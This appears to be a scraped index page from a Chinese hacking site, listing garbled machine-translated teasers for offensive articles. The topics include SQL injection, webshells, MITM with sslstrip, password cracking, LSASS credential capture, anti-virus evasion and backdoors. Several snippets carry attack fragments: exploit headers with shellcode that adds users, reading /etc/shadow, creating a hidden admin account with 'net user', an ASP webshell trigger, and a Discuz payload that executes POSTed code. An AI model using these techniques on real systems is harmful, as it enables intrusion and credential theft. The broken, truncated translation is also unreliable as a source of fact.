Let the administrator help you restart the machine-vulnerability warning-the black bar safety net

Let the administrator help you restart the machine Sometimes, we go through the database backup a batch to the Startup menu, you want the server on the next restart to run our batch processing. But we, Ah, etc., the server is not restarting, what should I do? Allow administrator to help us restar...

Teach you to see with a password youku videos-vulnerability warning-the black bar safety net

YouTube website of video can be set independently of the playback password, but did you know that: the watch have the password to the YouTube video don't actually need the password, Oh. The following describes two methods for youku video password cracking method. Youku video password cracking: Op...

Cain local overflow vulnerability analysis-vulnerability warning-the black bar safety net

Busy to shop around milw0rm. Find a Cain Overflow Exploit. See http://www. milw0rm. com/exploits/7 3 0 9 As a skilled your own debugging skills comes the analysis below. For Cain & Abel = v4. 9. 2 4the other I didn't, after all I'm just the analysis of vulnerabilities rather than just find...

How to make your own injection tool to hack websites-vulnerability warning-the black bar safety net

Usually we encounter injection vulnerability class of website most of the people are NBSI Or al D kind of injection tools. But some of the sites of the injection point is very difficult to construct, or that the injection of the statement special. If by hand to the injection while time-consuming...

How to hack SSS scanning tools-vulnerability warning-the black bar safety net

Recently is really too busy, while the countersunk finishing school to the exchange of network security research topics, while in the online to clean up the malicious website. I love machine follow me were non-stop, no how much rest of time okay my machine is a dual Xeon Server, ha in. One day...

Hack attack:use sslstrip for MiTM attack(Bypass https)-bug warning-the black bar safety net

Everyone knows, including the network for MiTM attacks can allow an attacker to more efficiently intercepted within the network the user's password and secret information. In BackTrack use EtterCap or ArpSpoof tool. But Ettercap supports the Protocol, only HTTP, FTP, Telnet, SMTP, etc. in clear...

Foreigners: how to get the remote computer's IP address-vulnerability warning-the black bar safety net

Most might think the first time how to find your friend's computer's IP address or find people with you in Yahoo Messenger or chat IP address. In this I will show you how to find remote computer's IP address in one simple step. I created a PHP script that allows you to more easily find you choose...

Test Join combined dictionary to crack a Linux password-vulnerability warning-the black bar safety net

The test environment, the RHEL5 system, The system root account a self-built account icnpunk one. root@localhost run ./ unshadow /etc/passwd /etc/shadow /tmp/passwd root@localhost run vim /tmp/passwd Delete not used rows, leaving only the need to hack the account:...

The use of CMDshell View 3 3 8 9-vulnerability warning-the black bar safety net

The use of CMDshell View 3 3 8 9 port VBS version of the method, many times we can only temporarily to obtain broiler Cmd permissions, many times the broiler 3 3 8 9 port has been changed, in this case, you may wish to Use this method to check, using the method, full copy, paste to cmd, return ca...

MS IIS 5.0/6.0 FTP Server remote overflow vulnerability(win2k)-vulnerability warning-the black bar safety net

IIS 5.0 FTPd / Remote r00t exploit Win2k SP4 targets bug found &exploited by Kingcope, kcope2atgooglemail.com Affects IIS6 with stack cookie protection August 2 0 0 9 - KEEP THIS 0DAY PRIV8 use I:Socket; $|=1; metasploit shellcode, adduser "winown:nwoniw" $sc =...

Teach you how to use php to sniff the hijacking of server data-vulnerability warning-the black bar safety net

A few days ago a thorn in our maillist send a foreigner to write articles, to the effect that you can use php to achieve data hijacking and forwarding. I scan a bit, and indeed feasible, then today out of previously used crap of the time, to write a piece of code to verify it idea. Foreigner...

Summary for session spoofing exploit-vulnerability warning-the black bar safety net

For session spoofing everyone Mongolia. Baidu has an article lied to the entire network community although there are a lot of people have been found to be the wrong theory of the misleading article. So many people think that session spoofing is very cattle x it is not That article called eWebEdit...

Can record windows login password stuff-vulnerability warning-the black bar safety net

from: t00ls.net ========Principle: windows Authentication in General are ultimately in the lsass process 默认 模块 是 msv10.dll while critical in its export function LsaApLogonUserEx2, the The present program by injecting code into the lsass process hook LsaApLogonUserEx2, the interception of the...

ORACLE to build the data file WriteWebShell collection-vulnerability warning-the black bar safety net

author: kj021320 Reprint please indicate the source In fact, similar to the ORACLE such a powerful database, really not necessary with this soil the way SQLJ stored procedure write file can also be forced to helpless the other machine does not support SQLJ and UTLFILE package is also to kill? Tha...

hook NtReadVirtualMemory interfere with anti-virus scanning-vulnerability warning-the black bar safety net

Article author: asmhttp://www.sbasm.cn Wrote a against scan something with you to share! The technical content is not high, large cow floating by.! Always write is a ring3 code, now very carefully put together a copycat version of the drive code, a long time not so seriously. Hope a big cow can...

About mobile phone SIM card vulnerability-vulnerability warning-the black bar safety net

The SIM card also the presence of vulnerability? Can't believe? This is the mobile giant's products, and today I on the Blog will put this BUG simple a description! One day in order to quickly store a phone number with a simple“!” As the storage name in quotes ignored, dbtel phone storage, but to...

SQL query result set for injecting the effects and use-vulnerability and early warning-the black bar safety net

For injection purposes, the error message is extremely important. The so-called error message refers to and the correct page different results back, the master is very attention to this point, which injection point the precise judgment is essential. The ask discussed under several categories of...

Small black are the commonly used background universal login password or-the vulnerability warning-the black bar safety net

After landing in the background, receiving a user input of Userid and Password data, respectively, and assigned to the user and pwd, and then use the sql="select from admin where username="&user&" and password="&pwd&"" This sentence to the user name and password to be verified. To common sense to...

HTML Creator Sender build 6 9 7 Local BOF Exploit-vulnerability warning-the black bar safety net

/usr/bin/env python HTML Creator & Sender = v2. 3 Build 6 9 7 Local Buffer Overflow Exploit SEH Coded By: DrIDE Based On: http://www.milw0rm.com/exploits/9446 Testd On: Windows XP SP2 Download: http://www.html-email.net/ Usage: Browse to file, enter anything for From and To, Send Email. import...

Discuz! Plugin Crazy Star < = 2.0 Sql injection Vulnerability-vulnerability warning-the black bar safety net

========================Author============================ + Founded : ZhaoHuAn + Contact : ZhengXingatshandagamesdotcom + Blog : http://www.patching.net/zhaohuan/ + Date : August, 26th 2 0 0 9 Double Seventh Festival ========================Soft Info========================= Software: Discuz!...

Hackers can invade Vientiane, the server of the method of analysis-vulnerability warning-the black bar safety net

Today, many Internet cafes have installed a Vientiane cafe management system, this system brings convenience is obvious. However, the more convenient the system The existence of security risks is greater, many hackers will come up with a hack of this management system approach, and some can even...

Detailed description of SSL and TLS Web Security penetration testing-vulnerability warning-the black bar safety net

If the Web Service of the SSL and TLS Protocol security problem, the consequences will be how? Obviously, in this case the attacker can have all your security information, including user name, passwords, credit card, Bank information...... All in all. This article will give the reader a detailed...

ECShop_V2. 6. 2 background to obtain webshell-vulnerability warning-the black bar safety net

Original author: oldjun Article source: http://www.oldjun.com/ Note: this article has been published in the hacker line of Defense of the 2 0 0 9 year 0 5 ECShop shop system is a free open source Online Store software, both in stability, code optimization, operational efficiency, load capacity,...

Practical analysis once the WinRoute Backdoor offensive and defensive live-vulnerability warning-the black bar safety net

The school through the Windows 2 0 0 0 and the winroute proxy way to access the Internet. These two days, the proxy server always appears some strange phenomenon, running the program seems to be very slow, but it will also automatically restart. Could it be a virus? Or in a Trojan. Anyway, go and...

Safari RSS feed:// buffer overflow Exp code-vulnerability warning-the black bar safety net

Safari RSS feed:// buffer overflow Exp code Copy the contents to the clipboard the program code !/ usr/bin/ruby Quick-n-dirty PoC for APPLE-SA-2 0 0 9-0 5-1 2 ala CVE-2 0 0 8-3 5 2 9 Safari RSS feed:// buffer overflow via libxml2 by KF of Digitalmunition and Netragard http://www.digitalmunition.c...

MP4 decoder vulnerability mining techniques-vulnerability warning-the black bar safety net

| ! --- MP4 decoder vulnerability discovery techniques For the format vulnerability is most prone to is an infinite loop, so for this vulnerability in the search method, my personal approach is person meat jokes, the attention of those that function inside the use of the cycle of operation of the...

Avast! 4.8.1335 Professional Edition core buffer overflow vulnerability-vulnerability warning-the black bar safety net

Avast! 4.8.1335 Professional Edition file system filter driver to the presence of local kernel buffer overflow vulnerability this vulnerability allows the intruder in the Windows platform with a limited user account to gain system privileges. include stdio. h include windows. h include winioctl. ...

the swf calls the net horse-vulnerability warning-the black bar safety net

The afternoon of research about the swf calling network horse, do not understand the swf yeah, the package pure script class net horse no problem, the package of the overflow type net horse will have problems. Simply or directly call the iframe, so it is a bit boring, really 脱裤子放屁 Yeah, but still...

Stream 0day-vulnerability warning-the black bar safety net

gxm Inscription: First of all as I am, gxm, very pleased with Kaka in the 2 Number 3 of the morning 2am more common study of the flow of data in this subject. Thanks Kaka selfless dedication. Technology sharing. Only allow this stream to fully play his strength. A principle First said, the NTFS...

global. asa achieve mass hung it-vulnerability warning-the black bar safety net

First statement: One, this Article no technical content, the master bypass for. Second, this article is not the Professor hung it to the knowledge of the purpose for the majority of webmasters to provide some protection ideas. One, what is the global. asa is? Global. asa file is an optional file...

Php168 v6 privilege elevation vulnerability-vulnerability warning-the black bar safety net

| by Ryat http://www.hackgood.com Every day at work,I haven't post on the forum... Previously issued a php168 v2008 privilege elevation vulnerability,this vulnerability is also shown in the same code segment Directly gives the exp,inside some details or some mean,interested students can...

CCProxy proxy software to hide the conspiracy-bug warning-the black bar safety net

AgentServerfor everyone to solve a lot of problems, such as blocking hackers and local area network to share Internet access, etc. This article we are going to discuss one out on the proxy server vulnerability, hope that the network can be given a certain attention. In order to reveal this...

Hack the network to achieve the overload attack to the process of parsing-vulnerability warning-the black bar safety net

In network overload attack, a shared resource or service due to the need to process large amounts of request that cannot be met from other users of the arrival of the request. For example, a user generates a lot of processes, then other users cannot run own processes. If a user uses a lot of disk...

Discuz custom template variable vulnerability-vulnerability warning-the black bar safety net

Variables : ',";ECHO ";$X=SUBSTRMD5$GET'B',2 8;IF$X=='7aaa' and$POST'A';// Replace the contents : aaaaaaaaaa Then the link The post variable b is md5 encrypted, if the first 2 8-3 1 bit is 7aaa then execute$POST'a'; Use the DZ Forum of classmates please self-check/forumdata/cache/file under...

Explain how to provide the right to the use of environment variables-vulnerability and early warning-the black bar safety net

First, we first understand under what environment variables! Environment variable generally refers to in theoperating systemis used to specify theoperating systemthe operating environment of some parameters, such as the temporary folder location and system folder locations, and so on. This point ...

DedeCMS V5. 3 exp-vulnerability warning-the black bar safety net

Delete the Site any file. 2. Proof absolute path The impact of the system = DedeCMS V5. 3 1. Delete any file. Registration of normal users...feel free to find a place to upload an attachment it is OK. Part of the code: Copy the code form name="form1" action="http:// 网站 地址...

Three hidden Webshell method-vulnerability warning-the black bar safety net

Author: Rist First: In our to tricks of the asp file added the following contents %if request"action"="ok" then% the shell code is inserted here %end if% Visit time on your hand leg of the asp files back plus? action=ok,you can The second: In our to tricks of the asp file added the following...

Hack SA under the purview of the idea of adaptation-vulnerability warning-the black bar safety net

Last time already got this station of the SHELL, but the back door has long been K, today inadvertently and got the injection. D detection soon came out gratifying information, the SA permissions, go to the NB inside can list the directory but not the execution, telnet each other 1 4 3 3 can not ...

Server Super hide account established with the detection filmography-vulnerability warning-the black bar safety net

A. Establish a individual who never delete off of the administrator user Steps: 1, on their own computer inside the establishment one. txt text files. 2, in the inside of the input content @echo off net user xixi 1 2 3 4 5 6 /add the annotation: front xixi is the user name behind 1 2 3 4 5 6 is...

WinRAR 7z-compressed packet processing overflow analysis and use-vulnerability and early warning-the black bar safety net

| This article has been published in the hacker line of Defense of the 2 0 0 7 year 4 monthly. The author and the hacker line of Defense on the retention of copyright, reproduced, please indicate the original source. For the reader: overflow of lovers Pre-knowledge: Assembly language, buffer...

The LAN ARP spoofing hung it to the way of detailed explanation-vulnerability warning-the black bar safety net

Web page hang Horsethe most difficult is to spread a small website, easy to invade but the access number is not much, harvest the broiler also is not very much. Therefore, a new hang horse way began to pop--LANARP spoofinghung it, as long as the local area network within a machine caught, it can...

Under Linux the rebound CmdLine Shell tips-vulnerability warning-the black bar safety net

Last nightshould be early this morningplaying for a long time friend of Linux WebShell, and wanted to practice what UDEV to provide the right it, and finally found that the server seems to have been patched. But still there are other harvest, so I just YY under Linux to bounce a shell problem...

Modify the packet to get WebShell-vulnerability warning-the black bar safety net

Recorded about this time is how to capture-on change pack-of uploaded-of to get to the WEBSHELL. After careful analysis, this website from either the main station or sub-Station does not exist any injection vulnerability is, of course, this site needless to say use MSSQL Data, and also cannot fin...

Besides the two ecshop background to get the shell methods-vulnerability warning-the black bar safety net

ecshop background to get the shell method, in addition to the oldjun large cattle that and the last said that, and found two. But each one of the restriction conditions, listen to me one by one. One: ecshop background a function is a sql Query, as shown: ! In fact, the feeling in a management...

Good fine enterprise management system injection vulnerability-vulnerability warning-the black bar safety net

Vulnerability file: en/DownloadShow. asp chinese/DownloadShow. asp The exploit: the In Baidu, type: inurl: DownloadShow. asp? DownID= In Google type: allinurl: DownloadShow. asp? DownID= Get the search page address copied down. Open the D2. 3 2. Paste the address detection of the address bar you...

Joomla! HTTP header cross-site scripting vulnerability-vulnerability warning-the black bar safety net

Joomla! Is an open source content management system CMS to. Joomla! Not properly filter the user in the HTTP request the the submission of the HTTPREFERER variable, a remote attacker can submit a malicious request to inject JavaScript or DHTML code and in the user's browser session. The following...

*nux how to create a backdoor-a vulnerability warning-the black bar safety net

Painstakingly（or ease of obtaining root after, Of course, want to long-term holding. To be later used to it. d0ing what u want t0 d0 : the traditional method is to build a back doorbackd00r. Even if the invasion is found, the better（advanced）back door still be able to make you again a relaxing...

Wowo mesh poly music share V 2.5 vulnerability-vulnerability warning-the black bar safety net

blog: www.link0day.cn Reprint please indicate the old saying. The official said this system: Wowo mesh poly music share V 2.5 Version 2.5 updates: 1. To add the song lyrics synchronization function; 2. To solve the player in other browsers is not compatible with the problem; 3. Modify the databas...

wordpress password reset vulnerability-vulnerability warning-the black bar safety net

============================================= - Release date: August 10th, 2 0 0 9 - Discovered by: Laurent Gaffié - Severity: Medium ============================================= I. VULNERABILITY ------------------------- WordPress = 2.8.3 Remote admin reset password II. BACKGROUND...

PHP extension extension to bypass the upload filter-vulnerability warning-the black bar safety net

To everyone demo a php suffix extension; you can bypass the upload your own test. php extension suffix: php3 php4 php5 php. xxx asp extension suffix: asa asp comes into cdx cer idc pl plex plx shtm shtml stm php can be saved as xx. php. xxx automatically ignore the back of the. xxx may also perfo...